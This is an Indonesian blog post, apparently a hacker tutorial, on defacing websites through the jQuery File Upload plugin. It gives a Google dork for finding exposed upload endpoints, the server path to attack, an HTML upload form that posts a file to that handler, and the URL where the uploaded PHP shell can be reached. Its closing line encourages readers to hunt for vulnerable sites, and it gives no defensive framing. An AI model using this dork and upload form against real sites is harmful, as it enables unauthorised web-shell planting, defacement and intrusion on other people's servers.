Deface Dengan Teknik JQUERY FILE UPLOAD

Deface Dengan Teknik JQUERY FILE UPLOAD

Unknown 8:53 AM
Hello , Kali ini saya akan membagikan cara deface menggunakan teknik JQuery File Upload dengan menggunakan CSRF , oke langsung saja dilakukan ^_^

▐ Dork : inurl:/jquery-file-upload/
▐ Exploit : http://nama-site/dir/jquery-file-upload/server/php/

Exploit CSRF nya :

 
<form method="POST" action="http://nama-site/dir/jquery-file-upload/server/php/"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
*nb --> format CSRF adalah csrf.html

Contoh target vuln:

Udah tau kan cara make nya , kalo sukses Shell akses nya di: http://nama-site/dir/jquery-file-upload/server/php/files/Shell.php 

Simple kan ^_^ selamat mencari bug nya ya kawan ^_^

KOMENTARLAH DENGAN SOPAN :)
MULUTMU HARIMAUMU :)
EmoticonEmoticon

Subscribe to: Post Comments (Atom)